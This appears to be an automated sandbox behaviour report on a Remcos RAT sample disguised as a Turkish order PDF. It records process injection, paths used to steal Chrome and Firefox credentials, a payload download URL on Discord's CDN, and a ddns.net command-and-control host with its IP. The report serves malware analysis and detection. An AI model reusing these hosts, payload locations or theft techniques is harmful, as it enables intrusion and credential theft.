Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 940000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: C00000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 970000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 990000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 5F0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 810000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 850000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 870000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 1000000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 3070000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 30B0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 30D0000 Jump to behavior
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Windows\SysWOW64\logagent.exe Code function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe 3_2_0040A5F5
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe Jump to behavior
Contains functionality to simulate mouse events
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00410145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 3_2_00410145
Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager3|
Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager
Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program ManagerJS;.
Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\logagent.exe Code function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z, 3_2_00409E7D
Source: C:\Windows\SysWOW64\logagent.exe Code function: GetLocaleInfoA, 3_2_1054B80C
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_004124A0 cpuid 3_2_004124A0
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00402580 GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,CreateThread, 3_2_00402580
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00412163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00412163

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR
Contains functionality to steal Firefox passwords or cookies
Source: C:\Windows\SysWOW64\logagent.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 3_2_0040728F
Source: C:\Windows\SysWOW64\logagent.exe Code function: \key3.db 3_2_0040728F
Contains functionality to steal Chrome passwords or cookies
Source: C:\Windows\SysWOW64\logagent.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 3_2_0040710F

Remote Access Functionality
barindex
Yara detected Remcos RAT
Source: Yara match File source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR
Detected Remcos RAT
Source: logagent.exe String found in binary or memory: Remcos_Mutex_Inj
Source: logagent.exe, 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Remcos_Mutex_Inj
Source: logagent.exe, 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.1 Propth_unencoverridev
Source: logagent.exe, 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: Remcos_Mutex_Inj
Source: logagent.exe, 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.1 Propth_unencoverridev
Contains functionality to launch a control a shell (cmd.exe)
Source: C:\Windows\SysWOW64\logagent.exe Code function: cmd.exe 3_2_00402B8A
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 652390 Sample: Yeni sipari#U015fi onaylay#... Startdate: 26/06/2022 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 6 other signatures 2->51 6 Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe 1 17 2->6         started        11 Eluiezilfw.exe 13 2->11         started        13 Eluiezilfw.exe 13 2->13         started        process3 dnsIp4 27 cdn.discordapp.com 162.159.130.233, 443, 49716, 49719 CLOUDFLARENETUS United States 6->27 29 192.168.2.1 unknown unknown 6->29 23 C:\Users\Public\Librariesluiezilfw.exe, PE32 6->23 dropped 25 C:\Users\...luiezilfw.exe:Zone.Identifier, ASCII 6->25 dropped 53 Writes to foreign memory regions 6->53 55 Allocates memory in foreign processes 6->55 57 Creates a thread in another existing process (thread injection) 6->57 15 logagent.exe 2 6->15         started        31 162.159.133.233, 443, 49745 CLOUDFLARENETUS United States 11->31 59 Multi AV Scanner detection for dropped file 11->59 61 Injects a PE file into a foreign processes 11->61 19 logagent.exe 11->19         started        33 162.159.134.233, 443, 49751 CLOUDFLARENETUS United States 13->33 21 DpiScaling.exe 13->21         started        file5 signatures6 process7 dnsIp8 35 blessmyhustlelord.ddns.net 37.0.14.195, 49746, 49747, 49749 WKD-ASIE Netherlands 15->35 37 Contains functionalty to change the wallpaper 15->37 39 Found stalling execution ending in API Sleep call 15->39 41 Contains functionality to steal Chrome passwords or cookies 15->41 43 4 other signatures 15->43 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.159.130.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false
37.0.14.195
 blessmyhustlelord.ddns.net Netherlands
198301 WKD-ASIE true
162.159.133.233
 unknown United States
13335 CLOUDFLARENETUS false
162.159.134.233
 unknown United States
13335 CLOUDFLARENETUS false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
blessmyhustlelord.ddns.net 37.0.14.195 true
cdn.discordapp.com 162.159.130.233 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://cdn.discordapp.com/attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm false
    		high
    Pw`~hustlelord.ddns.net true
    • Avira URL Cloud: safe
    		 unknown